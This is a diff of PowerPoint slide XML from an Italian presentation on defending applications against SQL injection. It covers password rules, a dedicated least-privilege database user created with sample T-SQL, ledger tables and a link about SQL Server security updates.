-            <a:ext cx="4198334" cy="572700"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en" dirty="0"/>
-              <a:t>Una buona password…</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="120" name="Google Shape;120;p30"/>
-          <p:cNvPicPr preferRelativeResize="0"/>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId3">
-            <a:alphaModFix/>
-          </a:blip>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4116500" y="448013"/>
-            <a:ext cx="911000" cy="911000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="121" name="Google Shape;121;p30"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1128450" y="2182797"/>
-            <a:ext cx="6887100" cy="2243867"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="115000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:srgbClr val="D93232"/>
-              </a:buClr>
-              <a:buSzPts val="1600"/>
-              <a:buFont typeface="Barlow Condensed"/>
-              <a:buChar char="●"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0"/>
-              <a:t>8+ </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
-              <a:t>caratteri</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="115000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:srgbClr val="D93232"/>
-              </a:buClr>
-              <a:buSzPts val="1600"/>
-              <a:buFont typeface="Barlow Condensed"/>
-              <a:buChar char="●"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en" sz="1600" dirty="0"/>
-              <a:t>Lettere minuscole e maiuscole</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
-              <a:lnSpc>
-                <a:spcPct val="115000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClr>
-                <a:srgbClr val="D93232"/>
-              </a:buClr>
-              <a:buSzPts val="1600"/>
-              <a:buChar char="●"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en" sz="1600" dirty="0"/>
-              <a:t>Numeri</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="457200" lvl="0" indent="-330200">
-              <a:lnSpc>
-                <a:spcPct val="115000"/>
-              </a:lnSpc>
-              <a:buClr>
-                <a:srgbClr val="D93232"/>
-              </a:buClr>
-              <a:buSzPts val="1600"/>
-              <a:buChar char="●"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
-              <a:t>Caratteri</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
-              <a:t>speciali</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1600" dirty="0"/>
-            </a:br>
-            <a:endParaRPr sz="1600" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="FF0000"/>
-              </a:solidFill>
-              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide40.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide42.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -23933,8 +25054,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1893525" y="1490741"/>
-            <a:ext cx="5356950" cy="572700"/>
+            <a:off x="647952" y="1490741"/>
+            <a:ext cx="7848095" cy="572700"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -23956,10 +25077,10 @@
               <a:buNone/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en" dirty="0"/>
-              <a:t>Altri accorgimenti: utente dedicato</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
+              <a:rPr lang="en" sz="2400" dirty="0"/>
+              <a:t>Altri accorgimenti: utente dedicato, least privilege</a:t>
+            </a:r>
+            <a:endParaRPr sz="2400" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -23997,12 +25118,308 @@
           </a:ln>
         </p:spPr>
       </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="8" name="Picture 7">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37F88177-6642-C600-E0E4-F28053B234AF}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId4"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1926135" y="2063441"/>
+            <a:ext cx="6202729" cy="2481091"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241180902"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide43.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 118">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11DAA30C-0B39-C748-D4D4-5684AF42BCFF}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="119" name="Google Shape;119;p30">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BDA0967-4F3B-78E3-0408-375C8A6861BA}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1893525" y="1490741"/>
+            <a:ext cx="5356950" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en" dirty="0"/>
+              <a:t>Altri accorgimenti: ledger tables</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="120" name="Google Shape;120;p30">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4325C7B-EC94-C01F-7DB8-1DBC522F9501}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="3" name="Picture 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD44FAEA-2793-0A9B-415B-EBB61A6662D4}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId4"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3017508" y="2063441"/>
+            <a:ext cx="3108984" cy="2562177"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3973934878"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide44.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 118">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F88D046-96ED-2B53-2887-BD66C18CC8B9}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="119" name="Google Shape;119;p30">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D121D8B8-EB67-47D1-E250-A5F41CBEED4A}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1893525" y="1490741"/>
+            <a:ext cx="5356950" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en" dirty="0"/>
+              <a:t>Non solo front-end</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="120" name="Google Shape;120;p30">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0BE3B9B-C834-B8BB-90A0-DE3B3FBC5426}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
       <p:sp>
         <p:nvSpPr>
           <p:cNvPr id="2" name="Google Shape;130;p31">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64B81C62-F688-1923-82CB-8633F6C98316}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1755B24A-5122-EF7A-F2FC-66195D9795BD}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -24015,8 +25432,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1128450" y="2195169"/>
-            <a:ext cx="6887100" cy="2292051"/>
+            <a:off x="1128450" y="4263163"/>
+            <a:ext cx="6887100" cy="224056"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -24038,176 +25455,11 @@
               <a:buSzPts val="1600"/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>USE master;</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>CREATE LOGIN '</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>myappuser</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>' WITH PASSWORD 'YourStrong@Passw0rd’;</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>USE </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>myappdb</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>;</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>CREATE USER '</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>myappuser</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>' FOR LOGIN '</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>myappuser</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>';</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>ALTER ROLE [</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>db_datareader</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>] ADD MEMBER '</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>myappuser</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>';</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>ALTER ROLE [</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>db_datawriter</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>] ADD MEMBER '</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>myappuser</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>';</a:t>
+              <a:rPr lang="en-US" sz="1050" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>https://sqlserverupdates.com/news/new-security-updates-to-fix-sql-injection-vulnerabilities/</a:t>
             </a:r>
             <a:br>
               <a:rPr lang="en-US" sz="1400" dirty="0">
@@ -24220,10 +25472,40 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="6" name="Picture 5">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D31E37A7-F646-67C6-41BE-2569672EAD77}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId5"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3288207" y="1999776"/>
+            <a:ext cx="2567586" cy="2160568"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241180902"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3022525534"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -24233,190 +25515,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide41.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 118"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="119" name="Google Shape;119;p30"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2288581" y="1497613"/>
-            <a:ext cx="4566836" cy="572700"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en" dirty="0"/>
-              <a:t>Bobby Tables (xkcd.com #327)</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="120" name="Google Shape;120;p30"/>
-          <p:cNvPicPr preferRelativeResize="0"/>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId3">
-            <a:alphaModFix/>
-          </a:blip>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4116500" y="448013"/>
-            <a:ext cx="911000" cy="911000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="122" name="Google Shape;122;p30"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1311750" y="2070313"/>
-            <a:ext cx="6520500" cy="169200"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
